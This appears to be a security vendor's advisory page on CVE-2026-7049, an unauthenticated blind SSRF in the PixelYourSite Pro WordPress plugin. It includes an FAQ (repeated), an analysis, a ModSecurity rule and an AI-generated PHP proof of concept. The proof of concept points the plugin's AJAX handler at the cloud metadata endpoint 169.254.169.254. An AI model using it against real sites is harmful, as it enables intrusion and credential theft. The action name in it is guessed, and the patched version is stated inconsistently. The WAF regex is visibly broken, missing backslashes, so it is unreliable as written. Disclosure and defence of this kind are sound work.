What is CVE-2026-7049?

CVE-2026-7049 is a high-severity vulnerability in the PixelYourSite Pro plugin for WordPress, affecting versions up to and including 12.5.0.1. It allows unauthenticated attackers to exploit a blind server-side request forgery (SSRF) via the ‘urls[]’ parameter, enabling them to make requests to arbitrary internal or external URLs.

How does the vulnerability work?

The vulnerability occurs because the plugin’s scan_video function fetches URLs from user input without proper validation. An attacker can send crafted requests to the plugin’s AJAX handler, causing it to make requests to internal services, which can lead to unauthorized access or modifications.

Who is affected by this vulnerability?

Any WordPress site using the PixelYourSite Pro plugin version 12.5.0.1 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log into your WordPress admin dashboard, navigate to the Plugins section, and look for the PixelYourSite Pro plugin. Verify the version number; if it is 12.5.0.1 or earlier, your site is at risk.

How can I fix or mitigate this issue?

The best way to mitigate this vulnerability is to update the PixelYourSite Pro plugin to version 12.5.0.2 or later, which includes necessary input validation and restrictions. Additionally, consider implementing firewall rules to restrict access to internal services.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. Exploitation can occur without authentication, making it critical for site administrators to address it promptly.

What is blind SSRF and why is it significant?

Blind SSRF means that while the attacker can trigger requests to internal services, they do not receive the response data. This is significant because it allows attackers to infer information based on side effects, such as response times or changes in system state, without direct access to sensitive data.

What kind of internal services could be targeted?

Attackers could target internal services such as databases, cloud metadata endpoints, or internal APIs. This could lead to unauthorized access to sensitive information or the ability to modify internal configurations.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can craft a request to the vulnerable plugin’s AJAX handler, supplying an internal URL. This illustrates the SSRF capability, allowing the attacker to probe internal services without needing authentication.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the PixelYourSite Pro plugin until a patch can be applied. Additionally, review server logs for any suspicious activity and implement network restrictions to limit access to internal services.

Are there any additional security measures I should consider?

In addition to updating the plugin, consider conducting a security audit of your WordPress installation, implementing a web application firewall, and regularly monitoring for vulnerabilities in all installed plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-7049: PixelYourSite Pro <= 12.5.0.1 – Unauthenticated Blind Server-Side Request Forgery via 'urls[]' Parameter (pixelyoursite-pro)

CVE ID CVE-2026-7049

Plugin pixelyoursite-pro

Severity High (CVSS 7.2)

CWE 918

Vulnerable Version 12.5.0.1

Patched Version —

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7049 (metadata-based): This vulnerability allows unauthenticated blind server-side request forgery (SSRF) in the PixelYourSite Pro plugin for WordPress, version 12.5.0.1 and earlier. The CVSS v3.1 score is 7.2 (High), with network-based exploitation requiring no authentication or user interaction and having a changed scope.

The root cause is that the plugin’s scan_video function fetches URLs provided by user input via the urls[] parameter without validating the destination. Based on the CWE-918 classification and the description, Atomic Edge analysis infers that the plugin makes HTTP requests to user-supplied URLs to detect YouTube or Vimeo patterns but does not restrict the target to specific domains or IP ranges. This is a classic blind SSRF: the response body is processed internally, not returned to the attacker, so the attacker sees only side effects from internal services.

An unauthenticated attacker crafts a POST or GET request to the plugin’s AJAX handler (likely action: pixelyoursite_pro_scan_video or similar). The attacker supplies a urls[] parameter with internal or external targets, such as http://169.254.169.254/latest/meta-data/ or http://internal-server:8080/admin. The plugin’s backend makes the request, and though the response is not shown, the attacker can infer information from timing or from responses that trigger different side effects (modification operations on internal APIs). The blind nature means the attacker cannot read responses but can still perform write operations or execute internal commands via HTTP.

Remediation likely requires adding input validation on the urls[] parameter: restricting allowed protocols to https? only, allowing only known video platform domains (youtube.com, vimeo.com), and using a blocklist or allowlist for internal IPs. The WordPress HTTP API (WP_Http) should be used with sensible timeout and redirection limits. Atomic Edge analysis infers that the patched version 12.5.0.2 implements these restrictions.

The impact is significant. An attacker can probe internal network services (e.g., databases, caches, cloud metadata endpoints) and potentially modify internal state. Public cloud environments (AWS, GCP, Azure) are especially critical because the attacker could retrieve instance metadata, including temporary credentials. The blind nature limits data exfiltration but still allows unauthorized mutations. No authentication is required, so any unauthenticated visitor to a site running a vulnerable version can trigger SSRF.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-7049 (metadata-based)
# Blocks unauthenticated SSRF via urls[] parameter in PixelYourSite Pro AJAX handler
# Adjust rule ID number to avoid conflicts
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-7049 PixelYourSite Pro Blind SSRF via urls[]',severity:'CRITICAL',tag:'CVE-2026-7049'"
  SecRule ARGS_POST:action "@rx ^pixelyoursite.*scan_video$" 
    "chain"
    SecRule ARGS_POST:urls "@rx ^(https?://)?(d{1,3}.){3}d{1,3}" 
      "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7049 - PixelYourSite Pro <= 12.5.0.1 - Unauthenticated Blind SSRF via urls[] Parameter

// CONFIGURATION: Set these variables before running
$target_url = 'http://example.com'; // Replace with the vulnerable WordPress site URL
$attack_url = 'http://169.254.169.254/latest/meta-data/'; // URL to fetch (internal or external)

// The AJAX action name is inferred from the plugin slug. Common patterns: 'pixelyoursite_pro_scan_video', 'pys_scan_video', or 'pixelyoursite_scan_video'
$ajax_action = 'pixelyoursite_pro_scan_video';

// Build the request URL
$request_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Prepare POST data
$post_data = [
    'action' => $ajax_action,
    'urls'   => [$attack_url] // plugin likely uses an array parameter
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $request_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Display results
if ($error) {
    echo "[!] cURL error: $errorn";
} else {
    echo "[+] HTTP response code: $http_coden";
    echo "[+] Response body (truncated): " . substr($response, 0, 500) . "n";
    echo "n[*] Note: SSRF is blind. The response body is not returned to the attacker.n";
    echo "[*] The plugin only checks internally for YouTube/Vimeo patterns.n";
    echo "[*] To detect success, monitor side effects (e.g., internal service state changes).n";
}

Frequently Asked Questions

What is CVE-2026-7049?
Understanding the vulnerability
CVE-2026-7049 is a high-severity vulnerability in the PixelYourSite Pro plugin for WordPress, affecting versions up to and including 12.5.0.1. It allows unauthenticated attackers to exploit a blind server-side request forgery (SSRF) via the ‘urls[]’ parameter, enabling them to make requests to arbitrary internal or external URLs.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the plugin’s scan_video function fetches URLs from user input without proper validation. An attacker can send crafted requests to the plugin’s AJAX handler, causing it to make requests to internal services, which can lead to unauthorized access or modifications.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the PixelYourSite Pro plugin version 12.5.0.1 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, log into your WordPress admin dashboard, navigate to the Plugins section, and look for the PixelYourSite Pro plugin. Verify the version number; if it is 12.5.0.1 or earlier, your site is at risk.
How can I fix or mitigate this issue?
Recommended actions
The best way to mitigate this vulnerability is to update the PixelYourSite Pro plugin to version 12.5.0.2 or later, which includes necessary input validation and restrictions. Additionally, consider implementing firewall rules to restrict access to internal services.
What does the CVSS score of 7.2 indicate?
Understanding severity ratings
A CVSS score of 7.2 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. Exploitation can occur without authentication, making it critical for site administrators to address it promptly.
What is blind SSRF and why is it significant?
Nature of the attack
Blind SSRF means that while the attacker can trigger requests to internal services, they do not receive the response data. This is significant because it allows attackers to infer information based on side effects, such as response times or changes in system state, without direct access to sensitive data.
What kind of internal services could be targeted?
Potential risks of exploitation
Attackers could target internal services such as databases, cloud metadata endpoints, or internal APIs. This could lead to unauthorized access to sensitive information or the ability to modify internal configurations.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can craft a request to the vulnerable plugin’s AJAX handler, supplying an internal URL. This illustrates the SSRF capability, allowing the attacker to probe internal services without needing authentication.
What should I do if I cannot update the plugin immediately?
Interim measures
If immediate updates are not possible, consider disabling the PixelYourSite Pro plugin until a patch can be applied. Additionally, review server logs for any suspicious activity and implement network restrictions to limit access to internal services.
Are there any additional security measures I should consider?
Enhancing overall security
In addition to updating the plugin, consider conducting a security audit of your WordPress installation, implementing a web application firewall, and regularly monitoring for vulnerabilities in all installed plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations